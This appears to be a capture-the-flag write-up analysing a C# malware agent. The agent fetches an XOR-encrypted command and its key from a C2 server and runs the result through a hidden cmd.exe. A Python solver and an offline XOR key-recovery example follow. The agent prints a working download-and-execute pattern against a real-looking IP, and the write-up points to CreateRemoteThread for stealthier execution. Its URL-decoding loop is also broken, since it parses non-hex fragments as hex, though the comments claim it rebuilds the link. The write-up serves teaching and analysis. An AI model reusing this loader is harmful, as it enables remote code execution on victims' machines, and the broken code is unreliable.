We have installed the newest anti-virus on our systems; however, this piece of malware managed to evade our detections. Maybe we should invest more into dynamic analysis.
Background Knowledge
Similar to , this challenge heavily relies on prior knowledge of techniques used by malware developers and encryption.
This challenge uses two endpoints on the C2 server:
The first endpoint is used to retrieve the encrypted shellcode to be executed by the victim.
The second endpoint is used to retrieve the key that decrypts the shellcode.
This technique is used to evade signature-based AV detection: even if artifacts of the encrypted shellcode are found on the system, a defender who does not also have the key will not be able to reverse engineer the payload.
You can read more about this .
Solution
The player is given an agent.cs file:
agent.cs
using System;
using System.Net;
using System.Text.Json;

class Program
{
    static void Main(string[] args)
    {
        // The C2 URL for the /shellcode endpoint, split into fragments and rebuilt piece by piece
        string s = "";
        string[] a = new string[] { "ht", "tp", ":", "/", "/", "1", "5", "7", ".", "2", "3", "0", ".", "2", "5", "1", ".", "0", ":", "6", "0", "0", "1", "/", "s", "h", "e", "l", "l", "c", "o", "d", "e" };
        foreach (string c in a)
        {
            s += new string(new char[] { (char)(Convert.ToInt32(c, 16) - 2) });
        }
        string shellcode = new WebClient().DownloadString(s);

        // Same trick for the /key endpoint, which returns a JSON object with the key
        s = "";
        a = new string[] { "ht", "tp", ":", "/", "/", "1", "5", "7", ".", "2", "3", "0", ".", "2", "5", "1", ".", "0", ":", "6", "0", "0", "1", "/", "k", "e", "y" };
        foreach (string c in a)
        {
            s += new string(new char[] { (char)(Convert.ToInt32(c, 16) - 2) });
        }
        string keyJson = new WebClient().DownloadString(s);
        var keyObject = JsonSerializer.Deserialize<KeyObject>(keyJson);
        string key = keyObject.key;
        int keyLength = keyObject.key_length;

        // Decrypt the payload and hand it to cmd.exe
        string command = Haxor(shellcode, key);
        using (var process = new System.Diagnostics.Process())
        {
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = $"/C {command}";
            process.StartInfo.CreateNoWindow = true;
            process.Start();
        }
    }

    // Repeating-key XOR: each character of a is XORed with the next character of b, wrapping around
    static string Haxor(string a, string b)
    {
        int c = a.Length;
        char[] d = new char[c];
        for (int i = 0; i < c; ++i)
        {
            d[i] = (char)(a[i] ^ b[i % b.Length]);
        }
        return new string(d);
    }

    class KeyObject
    {
        public string key { get; set; }
        public int key_length { get; set; }
    }
}
Wow, this malware developer is not very good at hiding the C2 server: you can eye-power the value of string[] a by mentally joining the fragments back into the link.
string command = Haxor(shellcode, key);
...
static string Haxor(string a, string b)
{
    int c = a.Length;
    char[] d = new char[c];
    for (int i = 0; i < c; ++i)
    {
        d[i] = (char)(a[i] ^ b[i % b.Length]);
    }
    return new string(d);
}
It seems like the shellcode is being XOR'ed against the key via the function called "Haxor".
For the more experienced malware developers, please don't mind my wrongful usage of cmd.exe to execute shellcode; I was very sleepy when making this challenge.
The shellcode should be executed via other techniques (e.g. CreateRemoteThread, etc.).
The challenge solution is simply to find the raw shellcode, which in this case is actually a string (it should really be injectable assembly).
solution.py
import requests


def xor(data, key):
    # Repeating-key XOR, mirroring Haxor() in agent.cs
    return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))


def decrypt(data, key):
    return xor(data, key)


if __name__ == '__main__':
    key = requests.get("http://157.230.251.0:6001/key").json()['key']
    shellcode = requests.get("http://157.230.251.0:6001/shellcode").text
    plaintext = decrypt(shellcode, key)
    print(plaintext)
    # Flag: CTF101{Do3s_xOr_evaDE_Av?} ...
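As an added example that is not part of the challenge files or the solver above, the script below reproduces Haxor() offline and answers the flag's question from the analyst's side: with both C2 responses captured from a proxy log the payload decodes directly, and because the key repeats, a guessed plaintext prefix as long as the key recovers the key even without the /key response. The key, the JSON body and the command are constructed sample values, not the live challenge data.

```python
# Added example: offline analysis of the two-endpoint XOR scheme used by agent.cs.
import json

# Constructed stand-ins for the /key and /shellcode responses (not the live C2 data).
KEY_JSON = '{"key": "s3cr3t_k3y", "key_length": 10}'
SAMPLE_COMMAND = "echo CTF101{constructed_sample_flag} > out.txt"


def haxor(data: str, key: str) -> str:
    """Repeating-key XOR, character for character, exactly like Haxor() in agent.cs.
    XOR is its own inverse, so the same call both encrypts and decrypts."""
    return "".join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))


def parse_key_response(body: str) -> str:
    """Mirror the agent's JsonSerializer step and check that the key_length hint
    really matches the key, which flags a truncated or tampered capture."""
    obj = json.loads(body)
    if len(obj["key"]) != obj["key_length"]:
        raise ValueError("key_length does not match key")
    return obj["key"]


def decrypt_capture(shellcode_body: str, key_body: str) -> str:
    """What an analyst does with both responses pulled from a proxy or PCAP."""
    return haxor(shellcode_body, parse_key_response(key_body))


def recover_key(ciphertext: str, known_prefix: str, key_length: int) -> str:
    """Known-plaintext weakness of repeating-key XOR: a correctly guessed prefix
    at least key_length characters long (the command's first word, say) yields
    the whole key, so the /key endpoint adds no real secrecy."""
    if len(known_prefix) < key_length:
        raise ValueError("prefix shorter than key")
    return haxor(ciphertext[:key_length], known_prefix[:key_length])


# Constructed capture: what the /shellcode endpoint would have served for SAMPLE_COMMAND.
CAPTURED_SHELLCODE = haxor(SAMPLE_COMMAND, "s3cr3t_k3y")

if __name__ == "__main__":
    print(decrypt_capture(CAPTURED_SHELLCODE, KEY_JSON))
    print(recover_key(CAPTURED_SHELLCODE, "echo CTF101", 10))
```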